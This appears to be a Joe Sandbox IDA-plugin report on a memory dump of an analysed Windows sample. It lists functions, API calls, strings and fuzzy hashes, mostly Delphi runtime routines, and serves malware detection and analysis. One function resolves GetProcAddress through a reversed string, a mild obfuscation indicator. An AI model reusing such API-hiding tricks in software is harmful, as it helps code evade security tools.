Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction ID: 8bf62595047dbf77255b9dd477cdbfd6411fd3ba3166f243fa09d69614d595af
Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
Instruction Fuzzy Hash: 6AE0927170421417D315A558BDC0EEA725DA75C710F00426ABA09C73C5EDA0AE944AE8

Function 02A0B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,02A2D106,00000000,02A2D11E), ref: 02A0B79A

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 010a08b00cb7f74ced8a3da4a9c419a90c1dca7232f7ab7cf90c6af5e1e00935
Instruction ID: 9cb446036fe7018d48c82e9aaf97645b9b770b4b6e2bdf563417d2d0c56f3bfb
Opcode Fuzzy Hash: 010a08b00cb7f74ced8a3da4a9c419a90c1dca7232f7ab7cf90c6af5e1e00935
Instruction Fuzzy Hash: D1F0A474945301DFD364DF28E68162577E9FB48714F015D29E698C7380EF34E8A9CB62

Function 02A0A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02A0BE72,00000000,02A0C08B,?,?,00000000,00000000), ref: 02A0A823

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction ID: 1cceb8f77dafaa017f91d726842297ba8f785c5d6847c5151728d66a368b3e33
Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction Fuzzy Hash: 66D05EA330E2602AE214915A3DC4DBB5AECCAC57A1F00403ABA88C6182D6008C0BDAB5

Function 02A0920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 02A09210

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction ID: 1c197db1d3c63ed6858c7af3f26fd1e7991fc7f8ba2e2750915b60a255f89cb9
Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction Fuzzy Hash: 91A01180888820828A8033282C02A383088A820F20FC88B80B8F8802E0EE2E023080A3

Function 02A020C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 02A0D294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02A0D29D

Part of subcall function 02A0D268: GetProcAddress.KERNEL32(00000000), ref: 02A0D281

Strings

VarMod, xrefs: 02A0D35B
VarI4FromStr, xrefs: 02A0D3C9
VarXor, xrefs: 02A0D39D
oleaut32.dll, xrefs: 02A0D298
VarIdiv, xrefs: 02A0D345
VarCyFromStr, xrefs: 02A0D421
VarR4FromStr, xrefs: 02A0D3DF
VarCmp, xrefs: 02A0D3B3
VarBstrFromCy, xrefs: 02A0D44D
VarOr, xrefs: 02A0D387
VarBoolFromStr, xrefs: 02A0D437
VarBstrFromBool, xrefs: 02A0D479
VarAnd, xrefs: 02A0D371
VarR8FromStr, xrefs: 02A0D3F5
VarNeg, xrefs: 02A0D2C1
VarDiv, xrefs: 02A0D32F
VarAdd, xrefs: 02A0D2ED
VarSub, xrefs: 02A0D303
VarMul, xrefs: 02A0D319
VarBstrFromDate, xrefs: 02A0D463
VarDateFromStr, xrefs: 02A0D40B
VariantChangeTypeEx, xrefs: 02A0D2AB
VarNot, xrefs: 02A0D2D7

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 93df13d62db4c2696b1ee10adebc207d963c008956fd45b4229cce664f048b09
Instruction ID: 0469fa1a3dfd7d6b0bae9d99f12db8f9c71aa1bd064616bedeae7989bdbe2106
Opcode Fuzzy Hash: 93df13d62db4c2696b1ee10adebc207d963c008956fd45b4229cce664f048b09
Instruction Fuzzy Hash: F4416AB7A88B085B52046AED7DC0427F79ED65CB243B0461AF4049B7C4ED31FC528E2A

Function 02A16ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02A16EDE
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02A16EEF
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02A16EFF
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02A16F0F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02A16F1F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02A16F2F
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02A16F3F

Strings

CoSuspendClassObjects, xrefs: 02A16F39
CoReleaseServerProcess, xrefs: 02A16F19
CoResumeClassObjects, xrefs: 02A16F29
CoAddRefServerProcess, xrefs: 02A16F09
CoCreateInstanceEx, xrefs: 02A16EE9
ole32.dll, xrefs: 02A16ED9
CoInitializeEx, xrefs: 02A16EF9

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: e3a8e9398c9f1429dfd3431d35d0754ad386cd527caf742d2c4d048a10f4a14b
Instruction ID: de78bcd054a7792e00ebbb1411a6d7e7ad0d2eabbc917a0901ceccb9e6f07dca
Opcode Fuzzy Hash: e3a8e9398c9f1429dfd3431d35d0754ad386cd527caf742d2c4d048a10f4a14b
Instruction Fuzzy Hash: C7F042E0AC93407EB614BBB46FC193627AEB520F197011C1A790395581EE79E4768F20

Function 02A02530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02A028CE

Strings

, xrefs: 02A02814
Unexpected Memory Leak, xrefs: 02A028C0
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02A02849
Unknown, xrefs: 02A0278C
An unexpected memory leak has occurred. , xrefs: 02A02690
bytes: , xrefs: 02A0275D
7, xrefs: 02A026A1
String, xrefs: 02A027A1
The unexpected small block leaks are:, xrefs: 02A02707

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: 68805d1ba7e2c2f95f2afce2289ceae1d1a87906bfdffc53181088e57b1bea52
Instruction ID: e6526762588b02a91c0f86082facf72f47f8a1306d6e5d19ea9abdb7a84a59da
Opcode Fuzzy Hash: 68805d1ba7e2c2f95f2afce2289ceae1d1a87906bfdffc53181088e57b1bea52
Instruction Fuzzy Hash: 5CA1D230E043648BEF21AB2CDCC8B99B6E5EB09350F1440E5ED49AB2C5CF759989CF51

Function 02A0252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

, xrefs: 02A02814
Unexpected Memory Leak, xrefs: 02A028C0
The sizes of unexpected leaked medium and large blocks are: , xrefs: 02A02849
An unexpected memory leak has occurred. , xrefs: 02A02690
bytes: , xrefs: 02A0275D
7, xrefs: 02A026A1
The unexpected small block leaks are:, xrefs: 02A02707

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 0de52962b5d4f3768524dedfe1ab6dcf59b7b5ea451ee345b74f39bd1965a7c8
Instruction ID: b234622a0b2d1ee4e7444536d5776dcd16c2ffdd439de46963acecb3083458cd
Opcode Fuzzy Hash: 0de52962b5d4f3768524dedfe1ab6dcf59b7b5ea451ee345b74f39bd1965a7c8
Instruction Fuzzy Hash: 1D71A130A043588EEF219B2CDCC8B99BAE5EB09744F1041E5D949972C1DF759989CF51

Function 02A0BDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,02A0C08B,?,?,00000000,00000000), ref: 02A0BDF6

Part of subcall function 02A0A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A0A7E2

Strings

:mm:ss, xrefs: 02A0C046
m/d/yy, xrefs: 02A0BEC5
AMPM , xrefs: 02A0C019
mmmm d, yyyy, xrefs: 02A0BEF2
:mm, xrefs: 02A0C029
AMPM, xrefs: 02A0C00A

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 4c4b3713c0fe25a118b9abc9f3add67d9553bd05e3cb9ee465a277e567c02ab5
Instruction ID: bcb167e5f559cfc8f460e70cd3c910d391c34ddeb820ba3c53c1a9e17c71a36f
Opcode Fuzzy Hash: 4c4b3713c0fe25a118b9abc9f3add67d9553bd05e3cb9ee465a277e567c02ab5
Instruction Fuzzy Hash: E3610134B402489BDB00EBA4FED0B9F77BBAB88700F509935A2019B6C5DE39DD05CB91

Function 02A1AFE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02A1B000
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02A1B017
IsBadReadPtr.KERNEL32(?,00000004), ref: 02A1B0AB
IsBadReadPtr.KERNEL32(?,00000002), ref: 02A1B0B7
IsBadReadPtr.KERNEL32(?,00000014), ref: 02A1B0CB

Strings

KernelBase, xrefs: 02A1B012
LoadLibraryExA, xrefs: 02A1B00D

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 3d3fb7afebf31d20f582326b46d4772ae2e23652303886b2ab96fc44e22d544e
Instruction ID: bc6568a988d53597e4a4dbba04ec4024027184068b3a305737345c327e01bb65
Opcode Fuzzy Hash: 3d3fb7afebf31d20f582326b46d4772ae2e23652303886b2ab96fc44e22d544e
Instruction Fuzzy Hash: BD3162B1640305BBEB20DBA8CDC5F69B7A8BF05778F044954EA64AB2C1DF35A950CB60

Function 02A0435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A04423,?,?,02A867C8,?,?,02A2E7A8,02A065B1,02A2D30D), ref: 02A04395
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A04423,?,?,02A867C8,?,?,02A2E7A8,02A065B1,02A2D30D), ref: 02A0439B
GetStdHandle.KERNEL32(000000F5,02A043E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A04423,?,?,02A867C8), ref: 02A043B0
WriteFile.KERNEL32(00000000,000000F5,02A043E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A04423,?,?), ref: 02A043B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02A043D4

Strings

Error, xrefs: 02A043C8
Runtime error at 00000000, xrefs: 02A0438E, 02A043CD

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 5bb4e2b0725cbcfad402774bc001e8a305ed0398528aa82e26e46e324338f8ef
Instruction ID: 56f2e8b42a198d6f126cebd8a4c91f364414fe13d5188aa0b1e6578031be9986
Opcode Fuzzy Hash: 5bb4e2b0725cbcfad402774bc001e8a305ed0398528aa82e26e46e324338f8ef
Instruction Fuzzy Hash: E5F0B460EC8350B5F610B3A47EC6F99776C774CF25F100A49B724A40C0AFA4A4CD8B27

Function 02A0AEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 02A0AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A0AD59
Part of subcall function 02A0AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A0AD7D
Part of subcall function 02A0AD3C: GetModuleFileNameA.KERNEL32(02A00000,?,00000105), ref: 02A0AD98
Part of subcall function 02A0AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A0AE2E

CharToOemA.USER32(?,?), ref: 02A0AEFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02A0AF18
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A0AF1E
GetStdHandle.KERNEL32(000000F4,02A0AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A0AF33
WriteFile.KERNEL32(00000000,000000F4,02A0AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A0AF39
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02A0AF5B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 02A0AF71

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 16494e6d4126358277c00cba9b3e9daef153e53372e14eab663c9c1c34080f50
Instruction ID: e2a97f2c2c0716e2a94d5edbc825254c3a42918b269aa67bff0dbf2abc4b4035
Opcode Fuzzy Hash: 16494e6d4126358277c00cba9b3e9daef153e53372e14eab663c9c1c34080f50
Instruction Fuzzy Hash: 0C115EB2584300BEE200FBA4EEC4F9B77EDAB44B04F404926B744D60E1DE75E9148B62

Function 02A0E58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A0E625
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A0E641
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02A0E67A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A0E6F7
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02A0E710
VariantCopy.OLEAUT32(?,00000000), ref: 02A0E745

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: a31fc3e6a0785d290552d7b0143332b63d4899e00a1093845b6195f3ca4e79c2
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: EF510C759416299BCB26DF98EAC0BD9B3BDAF4C300F0049D5E508E7281DA30AF819F61

Function 02A03598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A035BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02A03609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A035ED
RegCloseKey.ADVAPI32(?,02A03610,00000000,?,00000004,00000000,02A03609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A03603

Strings

FPUMaskValue, xrefs: 02A035E4
SOFTWARE\Borland\Delphi\RTL, xrefs: 02A035B0

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2a00000_x.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: c0072c70763cbf540c06f17cd371247ed1e2a7676646389218151f6e931e1f01
Instruction ID: ea8c521671752ac6837ec202c83bf3f17c2a4f1d312de7570a8b7552f601df7f
Opcode Fuzzy Hash: c0072c70763cbf540c06f17cd371247ed1e2a7676646389218151f6e931e1f01
Instruction Fuzzy Hash: 6001B575984218BAEB11DBD0AE82BBAB7ECE70CB00F1005A1BA04D66C0EA74A551CA59

Function 02A18274 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
GetProcAddress.KERNEL32(?,?), ref: 02A182D9

Strings

sserddAcorPteG, xrefs: 02A1828F
Kernel32, xrefs: 02A182BC

Memory Dump Source

Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

